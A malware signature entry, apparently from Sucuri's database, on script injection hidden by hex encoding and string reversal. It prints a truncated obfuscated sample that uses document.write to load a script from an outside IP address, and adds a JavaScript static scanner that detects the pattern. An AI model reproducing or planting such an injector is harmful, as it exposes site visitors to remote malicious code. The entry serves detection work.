
Malware entry: malware.hex_reverse_script

Description: Suspicious code that uses the .split("").reverse().join("") trick to obfuscate injection of scripts into a web page.

Many malicious scripts add one more layer of obfuscation by running the code through a common JavaScript obfuscator, so that the reversed script is also hex-encoded. For example:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38...skipped...\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
where "\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C" decodes to "=crs tpircs<", which reverses to "<script src=".
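
A static check for this pattern, as an added example (not Sucuri's signature or scanner code): it decodes the \xNN escapes in string literals as plain text, then flags a file in which split/reverse/join appear only in hex form and some literal reverses into script markup. The function names and the SAMPLE string are assumptions made for the example; SAMPLE is constructed from the hex fragments quoted above, with the payload cut down to the "=crs tpircs<" piece.

```javascript
// Static triage only: the scanned source is treated as text and never executed.

// Decode \xNN escapes; every other character is left untouched.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Decoded body of every single- or double-quoted string literal in the source.
function extractLiterals(source) {
  const literals = [];
  const re = /(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  let m;
  while ((m = re.exec(source)) !== null) literals.push(decodeHexEscapes(m[2]));
  return literals;
}

const reverse = (s) => s.split("").reverse().join("");

function scanHexReverseScript(source) {
  const literals = extractLiterals(source);
  const hexEscapes = (source.match(/\\x[0-9A-Fa-f]{2}/g) || []).length;
  // Method names that exist only in hex-encoded form, never in plain text.
  const hiddenNames = ["split", "reverse", "join", "write"].filter(
    (name) => literals.includes(name) && !source.includes(name));
  // Literals that turn into script markup once reversed.
  const reversedMarkup = literals.map(reverse)
    .filter((s) => /<\s*script\b/i.test(s));
  const chainHidden = ["split", "reverse", "join"]
    .every((name) => hiddenNames.includes(name));
  return { hexEscapes, hiddenNames, reversedMarkup,
           suspicious: chainHidden && reversedMarkup.length > 0 };
}

// Constructed sample (assumption): only fragments quoted in this entry,
// payload truncated to "=crs tpircs<", so it references no URL.
const SAMPLE = String.raw`var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))`;

console.log(scanHexReverseScript(SAMPLE));
```

Code that reverses a string openly, such as "hello".split("").reverse().join(""), is not flagged, because the method names are in plain text and no literal reverses into script markup.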



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb